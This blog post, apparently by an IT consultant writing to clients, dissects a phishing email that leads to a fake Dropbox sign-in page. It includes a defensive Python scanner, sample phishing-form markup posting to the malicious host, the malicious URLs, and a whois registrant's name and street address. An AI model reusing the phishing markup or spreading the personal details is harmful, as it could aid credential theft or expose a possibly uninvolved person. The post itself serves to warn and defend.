There is a reason I send out regular security bulletins explicitly warning about malicious email activity and instructing you, my clients, to call me before you do anything that could have serious repercussions.  That is because there is really bad stuff out there!

I received a voice mail from a client saying she received an email from her accountant and it contained instructions for using Dropbox.  (Dropbox is a file hosting service that offers cloud storage and file synchronization.)  When I listened to the recording, I wasn’t sure if she couldn’t follow the instructions or if she couldn’t get Dropbox to open.  Needless to say, she sent the email to her son, and he couldn’t get it to work either.

Then she called her accountant, who told her he didn’t send it, but that other clients also received the email.  After all of that, she ended her message asking me if her computer was OK.

Well, that was a tough question to answer.  Just the same I was able to conduct some forensics into what occurred with this email – and it was most certainly malicious.

Here is the text of the problematic email (unfortunately I couldn’t capture the header information).

[Image: screenshot of the phishing email, with the sender's name erased]

Now, I don’t know how many times I have told you not to click on links from people you don’t know, but that wasn’t the case here. This sender (whose name has been erased) is known to the recipient. However, I strongly doubt that any business person she knows uses arbitrary capitalization like this. I also doubt a professional would ever send an invoice labeled as a “doc” file with a “jpg” file type.

When you hover your mouse over the link, it shows http://ow.ly/ZZdSz. This is a form of URL (web address) shortening provided by the social site, HootSuite.

The resulting link resolves to the following page:

[Image: screenshot of the fake Dropbox sign-in page, with the real address visible in the browser's address bar]

On the surface this looks like a sign-in page for Dropbox. However, if you look carefully in the address bar, you do not see the address for Dropbox. What you do see is a mile of gibberish, which alerted me to the fact that this web site was not legitimate. I also realize that the majority of people who use the Internet do not look in their browser’s address bar. With that in mind, I plowed on.

I looked at the source code for this particular web page. And while the resulting HTML code isn’t anything I would expect you to understand, the most significant element is the repeated appearance of one Internet address that is used throughout. It is http://alllprotect.com, which is the source of this nonsense. Note that there are three “l”s in this name, which is not quite normal.
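The check I did by hand above, reading the page source for an address that does not belong to Dropbox, can be done with a short script. This is an added example and not part of the original post; it assumes you have saved the page's HTML to a file or pasted it as a string, and the sample HTML in it is constructed to resemble the bogus sign-in page.

```python
# Added example (not from the original post): scan a saved page's HTML source for
# hosts outside the brand it imitates. SAMPLE_HTML is constructed; the expected
# brand domain is an assumption you supply.
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes that load resources from, or send form data to, another host.
URL_ATTRS = {"href", "src", "action"}

class HostCollector(HTMLParser):
    """Collects every absolute host referenced by href/src/action attributes."""

    def __init__(self):
        super().__init__()
        self.hosts = Counter()   # host -> number of references
        self.form_targets = []   # hosts that receive submitted form data

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value:
                host = urlparse(value).hostname
                if host:  # relative URLs have no host; they stay on the page's own site
                    self.hosts[host.lower()] += 1
                    if tag == "form" and name == "action":
                        self.form_targets.append(host.lower())

def foreign_hosts(html, expected_domain):
    """Return (hosts outside expected_domain with counts, hosts that receive form data)."""
    parser = HostCollector()
    parser.feed(html)
    expected = expected_domain.lower()
    foreign = Counter({h: n for h, n in parser.hosts.items()
                       if h != expected and not h.endswith("." + expected)})
    return foreign, parser.form_targets

# Constructed sample resembling the page in the post: Dropbox look, but every
# asset loads from, and the password form posts to, a different host.
SAMPLE_HTML = """<html><head>
<link rel="stylesheet" href="http://alllprotect.com/css/dropbox.css">
<script src="http://alllprotect.com/js/login.js"></script>
</head><body><img src="http://alllprotect.com/img/logo.png">
<form action="http://alllprotect.com/login.php" method="post">
<input name="email"><input name="password" type="password"></form>
<a href="https://www.dropbox.com/help">Help</a></body></html>"""

if __name__ == "__main__":
    foreign, targets = foreign_hosts(SAMPLE_HTML, "dropbox.com")
    print(dict(foreign), "form data goes to:", targets)
```

A legitimate Dropbox page would reference only dropbox.com hosts, and its sign-in form would post back to dropbox.com; a single unrelated host appearing many times, and receiving the password form, is the giveaway.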

I ran the utility “whois” to find out information about this web site. The resulting page, from the web host GoDaddy, shows the following:

[Image: screenshot of the GoDaddy whois result for alllprotect.com]

There may, in fact, be a person named Dominick LaGatta living at 7207 Sandy Isle Lane in Spring, Texas. But the phone number is a Carlsbad, California exchange. Yes, I know, some people move and take their cell phones with them. But most don’t use a Gmail address like this person did. After all, whirldcitizen@gmail.com strikes me as something a kid would do if he was trying to act “cool.”

This is obviously a web site that was registered to perform malicious activity and to hide the actual owner of the site.

Still, in the attempt to find out all I could, I logged on to the web page using the email address, fredflintstone@bedrock.com, with a password of “Barney.” That produced the following Symantec alert:

[Image: screenshot of the Symantec alert]

This alert says that the web site matches the signature of a known attack. This means that Symantec has already detected this site as having malicious intent.

Now, if you didn’t have Symantec protection (to simulate that, I deliberately ignored the warning), the web site would have downloaded a Dropbox setup file. In my test case, Symantec quarantined it immediately, having recognized it as suspect. Again, if you didn’t have Symantec protection, this file would have downloaded.

There is no telling what this particular file could have done to your computer, your files, or your privacy if it was actually installed on your computer. As it stands, anyone who used their email address and regular password from any of the sites shown on the bogus web page now has a compromised email account. And that is why you must always be on the lookout for fake emails.

While the only thing you can do – short of changing your email address – is to change your password, that may not be sufficient. The fact that someone responded to this web page means that particular email address is going to be a target for additional attempts for more malicious payloads in the future.

So I will repeat my warning: If you ever get any mail that you are unsure about, either delete it, or contact me so that I can review the contents and let you know if it is safe or garbage.

Any questions?
